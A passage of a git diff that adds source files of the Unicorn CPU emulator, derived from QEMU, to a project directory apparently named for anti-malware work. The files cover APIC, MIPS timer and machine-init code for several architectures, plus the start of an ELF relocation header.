+ * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/> + */ +#include "qemu/thread.h" +#include "hw/i386/apic_internal.h" +#include "hw/i386/apic.h" +#include "qemu/host-utils.h" +#include "hw/i386/pc.h" + +#include "exec/address-spaces.h" + +#define MAX_APIC_WORDS 8 + +#define SYNC_FROM_VAPIC 0x1 +#define SYNC_TO_VAPIC 0x2 +#define SYNC_ISR_IRR_TO_VAPIC 0x4 + +static void apic_update_irq(APICCommonState *s); + +/* Find first bit starting from msb */ +static int apic_fls_bit(uint32_t value) +{ + return 31 - clz32(value); +} + +/* return -1 if no bit is set */ +static int get_highest_priority_int(uint32_t *tab) +{ + int i; + for (i = 7; i >= 0; i--) { + if (tab[i] != 0) { + return i * 32 + apic_fls_bit(tab[i]); + } + } + return -1; +} + +static void apic_sync_vapic(APICCommonState *s, int sync_type) +{ + VAPICState vapic_state; + //size_t length; + //off_t start; + int vector; + + if (!s->vapic_paddr) { + return; + } + if (sync_type & SYNC_FROM_VAPIC) { + cpu_physical_memory_read(NULL, s->vapic_paddr, &vapic_state, + sizeof(vapic_state)); + s->tpr = vapic_state.tpr; + } + if (sync_type & (SYNC_TO_VAPIC | SYNC_ISR_IRR_TO_VAPIC)) { + //start = offsetof(VAPICState, isr); + //length = offsetof(VAPICState, enabled) - offsetof(VAPICState, isr); + + if (sync_type & SYNC_TO_VAPIC) { + + vapic_state.tpr = s->tpr; + vapic_state.enabled = 1; + //start = 0; + //length = sizeof(VAPICState); + } + + vector = get_highest_priority_int(s->isr); + if (vector < 0) { + vector = 0; + } + vapic_state.isr = vector & 0xf0; + + vapic_state.zero = 0; + + vector = get_highest_priority_int(s->irr); + if (vector < 0) { + vector = 0; + } + vapic_state.irr = vector & 0xff; + + //cpu_physical_memory_write_rom(&address_space_memory, + // s->vapic_paddr + start, + // ((void *)&vapic_state) + start, length); + // FIXME qq + } +} + +static void apic_vapic_base_update(APICCommonState *s) +{ + 
apic_sync_vapic(s, SYNC_TO_VAPIC); +} + +#define foreach_apic(apic, deliver_bitmask, code) \ +{\ + int __i, __j;\ + for(__i = 0; __i < MAX_APIC_WORDS; __i++) {\ + uint32_t __mask = deliver_bitmask[__i];\ + if (__mask) {\ + for(__j = 0; __j < 32; __j++) {\ + if (__mask & (1U << __j)) {\ + apic = local_apics[__i * 32 + __j];\ + if (apic) {\ + code;\ + }\ + }\ + }\ + }\ + }\ +} + +static void apic_set_base(APICCommonState *s, uint64_t val) +{ + s->apicbase = (val & 0xfffff000) | + (s->apicbase & (MSR_IA32_APICBASE_BSP | MSR_IA32_APICBASE_ENABLE)); + /* if disabled, cannot be enabled again */ + if (!(val & MSR_IA32_APICBASE_ENABLE)) { + s->apicbase &= ~MSR_IA32_APICBASE_ENABLE; + cpu_clear_apic_feature(&s->cpu->env); + s->spurious_vec &= ~APIC_SV_ENABLE; + } +} + +static void apic_set_tpr(APICCommonState *s, uint8_t val) +{ + /* Updates from cr8 are ignored while the VAPIC is active */ + if (!s->vapic_paddr) { + s->tpr = val << 4; + apic_update_irq(s); + } +} + +static uint8_t apic_get_tpr(APICCommonState *s) +{ + apic_sync_vapic(s, SYNC_FROM_VAPIC); + return s->tpr >> 4; +} + +/* signal the CPU if an irq is pending */ +static void apic_update_irq(APICCommonState *s) +{ +} + +void apic_poll_irq(DeviceState *dev) +{ +} + +void apic_sipi(DeviceState *dev) +{ +} + +int apic_get_interrupt(DeviceState *dev) +{ + return 0; +} + +int apic_accept_pic_intr(DeviceState *dev) +{ + return 0; +} + +static void apic_pre_save(APICCommonState *s) +{ + apic_sync_vapic(s, SYNC_FROM_VAPIC); +} + +static void apic_post_load(APICCommonState *s) +{ +#if 0 + if (s->timer_expiry != -1) { + timer_mod(s->timer, s->timer_expiry); + } else { + timer_del(s->timer); + } +#endif +} + +static int apic_realize(struct uc_struct *uc, DeviceState *dev, Error **errp) +{ + return 0; +} + +static void apic_class_init(struct uc_struct *uc, ObjectClass *klass, void *data) +{ + APICCommonClass *k = APIC_COMMON_CLASS(uc, klass); + + k->realize = apic_realize; + k->set_base = apic_set_base; + k->set_tpr = 
apic_set_tpr; + k->get_tpr = apic_get_tpr; + k->vapic_base_update = apic_vapic_base_update; + k->pre_save = apic_pre_save; + k->post_load = apic_post_load; + //printf("... init apic class\n"); +} + +static const TypeInfo apic_info = { + "apic", + TYPE_APIC_COMMON, + + 0, + sizeof(APICCommonState), + NULL, + + NULL, + NULL, + NULL, + + NULL, + + apic_class_init, +}; + +void apic_register_types(struct uc_struct *uc) +{ + //printf("... register apic types\n"); + type_register_static(uc, &apic_info); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/intc/apic_common.c b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/intc/apic_common.c new file mode 100644 index 0000000..ad7b35a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/intc/apic_common.c @@ -0,0 +1,274 @@ +/* + * APIC support - common bits of emulated and KVM kernel model + * + * Copyright (c) 2004-2005 Fabrice Bellard + * Copyright (c) 2011 Jan Kiszka, Siemens AG + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. 
/* ---- apic_common.c: accessors shared by all APIC models --------------- */

/* Forward an IA32_APIC_BASE MSR write to the model's set_base hook;
 * no-op for CPUs without an APIC device. */
void cpu_set_apic_base(struct uc_struct *uc, DeviceState *dev, uint64_t val)
{
    if (dev) {
        APICCommonState *s = APIC_COMMON(uc, dev);
        APICCommonClass *info = APIC_COMMON_GET_CLASS(uc, s);
        info->set_base(s, val);
    }
}

/* Read IA32_APIC_BASE; a CPU without an APIC still reports the BSP flag. */
uint64_t cpu_get_apic_base(struct uc_struct *uc, DeviceState *dev)
{
    if (dev) {
        APICCommonState *s = APIC_COMMON(uc, dev);
        return s->apicbase;
    } else {
        return MSR_IA32_APICBASE_BSP;
    }
}

/* CR8 write path: forward the task priority to the model. */
void cpu_set_apic_tpr(struct uc_struct *uc, DeviceState *dev, uint8_t val)
{
    APICCommonState *s;
    APICCommonClass *info;

    if (!dev) {
        return;
    }

    s = APIC_COMMON(uc, dev);
    info = APIC_COMMON_GET_CLASS(uc, s);

    info->set_tpr(s, val);
}

/* CR8 read path; returns 0 when there is no APIC. */
uint8_t cpu_get_apic_tpr(struct uc_struct *uc, DeviceState *dev)
{
    APICCommonState *s;
    APICCommonClass *info;

    if (!dev) {
        return 0;
    }

    s = APIC_COMMON(uc, dev);
    info = APIC_COMMON_GET_CLASS(uc, s);

    return info->get_tpr(s);
}

/* Record the VAPIC backing page address and notify the model. */
void apic_enable_vapic(struct uc_struct *uc, DeviceState *dev, hwaddr paddr)
{
    APICCommonState *s = APIC_COMMON(uc, dev);
    APICCommonClass *info = APIC_COMMON_GET_CLASS(uc, s);

    s->vapic_paddr = paddr;
    info->vapic_base_update(s);
}

/* TPR access reporting is disabled in this port. */
void apic_handle_tpr_access_report(DeviceState *dev, target_ulong ip,
                                   TPRAccess access)
{
    //APICCommonState *s = APIC_COMMON(NULL, dev);

    //vapic_report_tpr_access(s->vapic, CPU(s->cpu), ip, access);
}

/* Compute the next timer deadline into s->next_time / s->timer_expiry.
 * Returns false when the timer is masked or already expired (one-shot)
 * or has a zero initial count (periodic). */
bool apic_next_timer(APICCommonState *s, int64_t current_time)
{
    int64_t d;

    /* We need to store the timer state separately to support APIC
     * implementations that maintain a non-QEMU timer, e.g. inside the
     * host kernel. This open-coded state allows us to migrate between
     * both models. */
    s->timer_expiry = -1;

    if (s->lvt[APIC_LVT_TIMER] & APIC_LVT_MASKED) {
        return false;
    }

    /* Ticks elapsed since the initial count was loaded. */
    d = (current_time - s->initial_count_load_time) >> s->count_shift;

    if (s->lvt[APIC_LVT_TIMER] & APIC_LVT_TIMER_PERIODIC) {
        if (!s->initial_count) {
            return false;
        }
        /* Round up to the next period boundary. */
        d = ((d / ((uint64_t)s->initial_count + 1)) + 1) *
            ((uint64_t)s->initial_count + 1);
    } else {
        /* One-shot: nothing left to do once the count has run out. */
        if (d >= s->initial_count) {
            return false;
        }
        d = (uint64_t)s->initial_count + 1;
    }
    s->next_time = s->initial_count_load_time + (d << s->count_shift);
    s->timer_expiry = s->next_time;
    return true;
}

/* Reset the APIC to its INIT state (SDM "wait-for-SIPI" on APs).
 *
 * FIX: the original called APIC_COMMON_GET_CLASS(uc, s) *before* the
 * `if (!s)` NULL check, dereferencing a potentially NULL object; the
 * class is now fetched only after the check. */
void apic_init_reset(struct uc_struct *uc, DeviceState *dev)
{
    APICCommonState *s = APIC_COMMON(uc, dev);
    APICCommonClass *info;
    int i;

    if (!s) {
        return;
    }
    info = APIC_COMMON_GET_CLASS(uc, s);
    s->tpr = 0;
    s->spurious_vec = 0xff;
    s->log_dest = 0;
    s->dest_mode = 0xf;
    memset(s->isr, 0, sizeof(s->isr));
    memset(s->tmr, 0, sizeof(s->tmr));
    memset(s->irr, 0, sizeof(s->irr));
    for (i = 0; i < APIC_LVT_NB; i++) {
        s->lvt[i] = APIC_LVT_MASKED;
    }
    s->esr = 0;
    memset(s->icr, 0, sizeof(s->icr));
    s->divide_conf = 0;
    s->count_shift = 0;
    s->initial_count = 0;
    s->initial_count_load_time = 0;
    s->next_time = 0;
    s->wait_for_sipi = !cpu_is_bsp(s->cpu);

    if (s->timer) {
        // timer_del(s->timer);
    }
    s->timer_expiry = -1;

    if (info->reset) {
        info->reset(s);
    }
}

/* Mark this CPU's APIC as the bootstrap processor. */
void apic_designate_bsp(struct uc_struct *uc, DeviceState *dev)
{
    APICCommonState *s;

    if (dev == NULL) {
        return;
    }

    s = APIC_COMMON(uc, dev);
    s->apicbase |= MSR_IA32_APICBASE_BSP;
}
/* qdev reset handler: bring the APIC back to its power-on state. */
static void apic_reset_common(struct uc_struct *uc, DeviceState *dev)
{
    APICCommonState *s = APIC_COMMON(uc, dev);
    APICCommonClass *info = APIC_COMMON_GET_CLASS(uc, s);
    bool bsp = cpu_is_bsp(s->cpu);

    s->apicbase = APIC_DEFAULT_ADDRESS | MSR_IA32_APICBASE_ENABLE |
        (bsp ? MSR_IA32_APICBASE_BSP : 0);

    s->vapic_paddr = 0;
    info->vapic_base_update(s);

    apic_init_reset(uc, dev);

    if (bsp) {
        /*
         * LINT0 delivery mode on CPU #0 is set to ExtInt at initialization
         * time typically by BIOS, so PIC interrupt can be delivered to the
         * processor when local APIC is enabled.
         */
        s->lvt[APIC_LVT_LINT0] = 0x700;
    }
}

/* Common realize: allocate an APIC index, chain to the model's realize,
 * and map the shared MMIO window exactly once. */
static int apic_common_realize(struct uc_struct *uc, DeviceState *dev, Error **errp)
{
    APICCommonState *s = APIC_COMMON(uc, dev);
    APICCommonClass *info;

    /* Hard cap on the number of APIC instances per emulator instance. */
    if (uc->apic_no >= MAX_APICS) {
        error_setg(errp, "%s initialization failed.",
                   object_get_typename(OBJECT(dev)));
        return -1;
    }
    s->idx = uc->apic_no++;

    info = APIC_COMMON_GET_CLASS(uc, s);
    info->realize(uc, dev, errp);

    /* Only the first instance registers the MMIO region. */
    if (!uc->mmio_registered) {
        ICCBus *icc_bus = ICC_BUS(uc, qdev_get_parent_bus(dev));
        memory_region_add_subregion(icc_bus->apic_address_space, 0,
                                    &s->io_memory);
        uc->mmio_registered = true;
    }

    /* Note: We need at least 1M to map the VAPIC option ROM */
    if (!uc->vapic && s->vapic_control & VAPIC_ENABLE_MASK) {
        // ram_size >= 1024 * 1024) { // FIXME
        uc->vapic = NULL;
    }
    s->vapic = uc->vapic;
    if (uc->apic_report_tpr_access && info->enable_tpr_reporting) {
        info->enable_tpr_reporting(s, true);
    }

    return 0;
}

/* Install the common reset/realize hooks on the device class. */
static void apic_common_class_init(struct uc_struct *uc, ObjectClass *klass, void *data)
{
    ICCDeviceClass *idc = ICC_DEVICE_CLASS(uc, klass);
    DeviceClass *dc = DEVICE_CLASS(uc, klass);

    dc->reset = apic_reset_common;
    idc->realize = apic_common_realize;
    /*
     * Reason: APIC and CPU need to be wired up by
     * x86_cpu_apic_create()
     */
    dc->cannot_instantiate_with_device_add_yet = true;
}

/* Positional TypeInfo init — field names not visible from here; the
 * first four appear to be name/parent/class_size/instance_size, and the
 * trailing `true` presumably marks the type abstract — verify against
 * the TypeInfo declaration. */
static const TypeInfo apic_common_type = {
    TYPE_APIC_COMMON,        /* name */
    TYPE_DEVICE,             /* parent */
    sizeof(APICCommonClass), /* class_size */
    sizeof(APICCommonState), /* instance_size */
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    apic_common_class_init,
    NULL,
    NULL,
    true,
};

/* Register the abstract APIC base type with the QOM type system. */
void apic_common_register_types(struct uc_struct *uc)
{
    type_register_static(uc, &apic_common_type);
}
*/ + env->vbr = 0; + env->pc = 0; + + return 0; +} + +void dummy_m68k_machine_init(struct uc_struct *uc) +{ + static QEMUMachine dummy_m68k_machine = { 0 }; + dummy_m68k_machine.name = "dummy", + dummy_m68k_machine.init = dummy_m68k_init, + dummy_m68k_machine.is_default = 1, + dummy_m68k_machine.arch = UC_ARCH_M68K, + + //printf(">>> dummy_m68k_machine_init\n"); + qemu_register_machine(uc, &dummy_m68k_machine, TYPE_MACHINE, NULL); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/mips/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/mips/Makefile.objs new file mode 100644 index 0000000..910e23b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/mips/Makefile.objs @@ -0,0 +1,2 @@ +obj-y += mips_r4k.o +obj-y += addr.o cputimer.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/mips/addr.c b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/mips/addr.c new file mode 100644 index 0000000..ff3b952 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/mips/addr.c @@ -0,0 +1,39 @@ +/* + * QEMU MIPS address translation support + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#include "hw/hw.h" +#include "hw/mips/cpudevs.h" + +uint64_t cpu_mips_kseg0_to_phys(void *opaque, uint64_t addr) +{ + return addr & 0x1fffffffll; +} + +uint64_t cpu_mips_phys_to_kseg0(void *opaque, uint64_t addr) +{ + return addr | ~0x7fffffffll; +} + +uint64_t cpu_mips_kvm_um_phys_to_kseg0(void *opaque, uint64_t addr) +{ + return addr | 0x40000000ll; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/mips/cputimer.c b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/mips/cputimer.c new file mode 100644 index 0000000..71d2881 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/mips/cputimer.c @@ -0,0 +1,131 @@ +/* + * QEMU MIPS timer support + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
/* ---- cputimer.c: MIPS CP0 Count/Compare timer ------------------------- */

/* FIX: parenthesized — the original `100 * 1000 * 1000` without parens
 * misbehaves under operator precedence if the macro is ever used inside
 * a larger expression. */
#define TIMER_FREQ (100 * 1000 * 1000)

/* XXX: do not use a global */
/* CP0 Random: pseudo-random TLB index in [CP0_Wired, nb_tlb), never the
 * same index twice in a row. */
uint32_t cpu_mips_get_random (CPUMIPSState *env)
{
    static uint32_t lfsr = 1;
    static uint32_t prev_idx = 0;
    uint32_t idx;
    uint32_t nb_rand_tlb = env->tlb->nb_tlb - env->CP0_Wired;

    /* FIX: with zero or one selectable entries the original do/while
     * divided by zero (nb_rand_tlb == 0) or spun forever waiting for a
     * different index (nb_rand_tlb == 1). */
    if (nb_rand_tlb <= 1) {
        prev_idx = env->CP0_Wired;
        return env->CP0_Wired;
    }

    /* Don't return same value twice, so get another value */
    do {
        lfsr = (lfsr >> 1) ^ ((0-(lfsr & 1u)) & 0xd0000001u);
        idx = lfsr % nb_rand_tlb + env->CP0_Wired;
    } while (idx == prev_idx);
    prev_idx = idx;
    return idx;
}

/* MIPS R4K timer — re-arming is disabled in this port. */
static void cpu_mips_timer_update(CPUMIPSState *env)
{
#if 0
    uint64_t now, next;
    uint32_t wait;

    now = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL);
    wait = env->CP0_Compare - env->CP0_Count -
           (uint32_t)muldiv64(now, TIMER_FREQ, get_ticks_per_sec());
    next = now + muldiv64(wait, get_ticks_per_sec(), TIMER_FREQ);
    timer_mod(env->timer, next);
#endif
}

#if 0
/* Expire the timer. */
static void cpu_mips_timer_expire(CPUMIPSState *env)
{
    cpu_mips_timer_update(env);
    if (env->insn_flags & ISA_MIPS32R2) {
        env->CP0_Cause |= 1 << CP0Ca_TI;
    }
    //qemu_irq_raise(env->irq[(env->CP0_IntCtl >> CP0IntCtl_IPTI) & 0x7]);
}
#endif

/* CP0 Count read: frozen value when the DC (disable count) bit is set,
 * otherwise derived from the virtual clock. */
uint32_t cpu_mips_get_count (CPUMIPSState *env)
{
    if (env->CP0_Cause & (1 << CP0Ca_DC)) {
        return env->CP0_Count;
    } else {
        uint64_t now;

        now = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL);
        //if (timer_pending(env->timer)
        //    && timer_expired(env->timer, now)) {
        //    /* The timer has already expired. */
        //    cpu_mips_timer_expire(env);
        //}

        return env->CP0_Count +
            (uint32_t)muldiv64(now, TIMER_FREQ, get_ticks_per_sec());
    }
}

/* CP0 Count write — entirely disabled in this port. */
void cpu_mips_store_count (CPUMIPSState *env, uint32_t count)
{
#if 0
    /*
     * This gets called from cpu_state_reset(), potentially before timer init.
     * So env->timer may be NULL, which is also the case with KVM enabled so
     * treat timer as disabled in that case.
     */
    if (env->CP0_Cause & (1 << CP0Ca_DC) || !env->timer)
        env->CP0_Count = count;
    else {
        /* Store new count register */
        env->CP0_Count =
            count - (uint32_t)muldiv64(qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL),
                                       TIMER_FREQ, get_ticks_per_sec());
        /* Update timer timer */
        cpu_mips_timer_update(env);
    }
#endif
}

/* CP0 Compare write: store the value and clear a pending timer
 * interrupt on R2+ cores. */
void cpu_mips_store_compare (CPUMIPSState *env, uint32_t value)
{
    env->CP0_Compare = value;
    if (!(env->CP0_Cause & (1 << CP0Ca_DC)))
        cpu_mips_timer_update(env);
    if (env->insn_flags & ISA_MIPS32R2)
        env->CP0_Cause &= ~(1 << CP0Ca_TI);
    //qemu_irq_lower(env->irq[(env->CP0_IntCtl >> CP0IntCtl_IPTI) & 0x7]);
}

/* Resume counting from the stored Count value. */
void cpu_mips_start_count(CPUMIPSState *env)
{
    cpu_mips_store_count(env, env->CP0_Count);
}

/* Freeze Count at its current clock-derived value. */
void cpu_mips_stop_count(CPUMIPSState *env)
{
    /* Store the current value */
    env->CP0_Count += (uint32_t)muldiv64(qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL),
                                         TIMER_FREQ, get_ticks_per_sec());
}
+*/ + +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh, 2015 */ + +#include "hw/hw.h" +#include "hw/mips/mips.h" +#include "hw/mips/cpudevs.h" +#include "sysemu/sysemu.h" +#include "hw/boards.h" +#include "exec/address-spaces.h" + + +static int mips_r4k_init(struct uc_struct *uc, MachineState *machine) +{ + const char *cpu_model = machine->cpu_model; + + /* init CPUs */ + if (cpu_model == NULL) { +#ifdef TARGET_MIPS64 + cpu_model = "R4000"; +#else + cpu_model = "24Kf"; +#endif + } + + uc->cpu = (void*) cpu_mips_init(uc, cpu_model); + if (uc->cpu == NULL) { + fprintf(stderr, "Unable to find CPU definition\n"); + return -1; + } + + return 0; +} + +void mips_machine_init(struct uc_struct *uc) +{ + static QEMUMachine mips_machine = { + NULL, + "mips", + mips_r4k_init, + NULL, + 0, + 1, + UC_ARCH_MIPS, + }; + + qemu_register_machine(uc, &mips_machine, TYPE_MACHINE, NULL); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc/Makefile.objs new file mode 100644 index 0000000..20bd940 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc/Makefile.objs @@ -0,0 +1 @@ +obj-y += leon3.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc/leon3.c b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc/leon3.c new file mode 100644 index 0000000..150aaed --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc/leon3.c @@ -0,0 +1,72 @@ +/* + * QEMU Leon3 System Emulator + * + * Copyright (c) 2010-2011 AdaCore + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the 
following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh, 2015 */ + +#include "hw/hw.h" +#include "hw/sparc/sparc.h" +#include "qemu/timer.h" +#include "sysemu/sysemu.h" +#include "hw/boards.h" +#include "exec/address-spaces.h" + + +static int leon3_generic_hw_init(struct uc_struct *uc, MachineState *machine) +{ + const char *cpu_model = machine->cpu_model; + SPARCCPU *cpu; + + /* Init CPU */ + if (!cpu_model) { + cpu_model = "LEON3"; + } + + cpu = cpu_sparc_init(uc, cpu_model); + uc->cpu = CPU(cpu); + if (cpu == NULL) { + fprintf(stderr, "qemu: Unable to find Sparc CPU definition\n"); + return -1; + } + + cpu_sparc_set_id(&cpu->env, 0); + + return 0; +} + +void leon3_machine_init(struct uc_struct *uc) +{ + static QEMUMachine leon3_generic_machine = { + NULL, + "leon3_generic", + leon3_generic_hw_init, + NULL, + 0, + 1, + UC_ARCH_SPARC, + }; + + //printf(">>> leon3_machine_init\n"); + qemu_register_machine(uc, &leon3_generic_machine, TYPE_MACHINE, NULL); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc64/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc64/Makefile.objs new file mode 100644 index 0000000..a84cfe3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc64/Makefile.objs @@ -0,0 +1 @@ +obj-y += sun4u.o diff --git 
a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc64/sun4u.c b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc64/sun4u.c new file mode 100644 index 0000000..1995d31 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc64/sun4u.c @@ -0,0 +1,63 @@ +/* + * QEMU Sun4u/Sun4v System Emulator + * + * Copyright (c) 2005 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. 
+ */ +#include "hw/hw.h" +#include "hw/sparc/sparc.h" +#include "qemu/timer.h" +#include "sysemu/sysemu.h" +#include "hw/boards.h" +#include "exec/address-spaces.h" + + +/* Sun4u hardware initialisation */ +static int sun4u_init(struct uc_struct *uc, MachineState *machine) +{ + const char *cpu_model = machine->cpu_model; + SPARCCPU *cpu; + + if (cpu_model == NULL) + cpu_model = "Sun UltraSparc IV"; + + cpu = cpu_sparc_init(uc, cpu_model); + if (cpu == NULL) { + fprintf(stderr, "Unable to find Sparc CPU definition\n"); + return -1; + } + + return 0; +} + +void sun4u_machine_init(struct uc_struct *uc) +{ + static QEMUMachine sun4u_machine = { + NULL, + "sun4u", + sun4u_init, + NULL, + 1, // XXX for now + 1, + UC_ARCH_SPARC, + }; + + qemu_register_machine(uc, &sun4u_machine, TYPE_MACHINE, NULL); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/config.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/config.h new file mode 100644 index 0000000..e20f786 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/config.h @@ -0,0 +1,2 @@ +#include "config-host.h" +#include "config-target.h" diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/elf.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/elf.h new file mode 100644 index 0000000..b55aaa6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/elf.h @@ -0,0 +1,560 @@ +#ifndef QEMU_ELF_H +#define QEMU_ELF_H + +/* + * i386 ELF relocation types + */ +#define R_386_NONE 0 +#define R_386_32 1 +#define R_386_PC32 2 +#define R_386_GOT32 3 +#define R_386_PLT32 4 +#define R_386_COPY 5 +#define R_386_GLOB_DAT 6 +#define R_386_JMP_SLOT 7 +#define R_386_RELATIVE 8 +#define R_386_GOTOFF 9 +#define R_386_GOTPC 10 +#define R_386_NUM 11 +/* Not a dynamic reloc, so not included in R_386_NUM. Used in TCG. 
*/ +#define R_386_PC8 23 + +/* + * Mips ELF relocation types + */ +#define R_MIPS_NONE 0 +#define R_MIPS_16 1 +#define R_MIPS_32 2 +#define R_MIPS_REL32 3 +#define R_MIPS_26 4 +#define R_MIPS_HI16 5 +#define R_MIPS_LO16 6 +#define R_MIPS_GPREL16 7 +#define R_MIPS_LITERAL 8 +#define R_MIPS_GOT16 9 +#define R_MIPS_PC16 10 +#define R_MIPS_CALL16 11 +#define R_MIPS_GPREL32 12 +/* The remaining relocs are defined on Irix, although they are not + in the MIPS ELF ABI. */ +#define R_MIPS_UNUSED1 13 +#define R_MIPS_UNUSED2 14 +#define R_MIPS_UNUSED3 15 +#define R_MIPS_SHIFT5 16 +#define R_MIPS_SHIFT6 17 +#define R_MIPS_64 18 +#define R_MIPS_GOT_DISP 19 +#define R_MIPS_GOT_PAGE 20 +#define R_MIPS_GOT_OFST 21 +/* + * The following two relocation types are specified in the MIPS ABI + * conformance guide version 1.2 but not yet in the psABI. + */ +#define R_MIPS_GOTHI16 22 +#define R_MIPS_GOTLO16 23 +#define R_MIPS_SUB 24 +#define R_MIPS_INSERT_A 25 +#define R_MIPS_INSERT_B 26 +#define R_MIPS_DELETE 27 +#define R_MIPS_HIGHER 28 +#define R_MIPS_HIGHEST 29 +/* + * The following two relocation types are specified in the MIPS ABI + * conformance guide version 1.2 but not yet in the psABI. + */ +#define R_MIPS_CALLHI16 30 +#define 